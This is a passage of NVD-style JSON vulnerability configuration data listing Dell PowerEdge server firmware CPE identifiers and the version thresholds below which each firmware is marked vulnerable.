"cpe:2.3:h:dell:poweredge_r650xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr11_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr11:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr12_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr12:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4510c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4510c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4520c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4520c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t150_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r250_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r250:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8545_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8545:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r840_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r840:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx740c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx740c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx840c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx840c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c4140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c4140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:dss_8440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:dss_8440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe2420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe2420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r240_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r240:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r730xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r730xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c4130_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c4130:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r930_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r930:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m630_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m630_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m830_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m830_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { 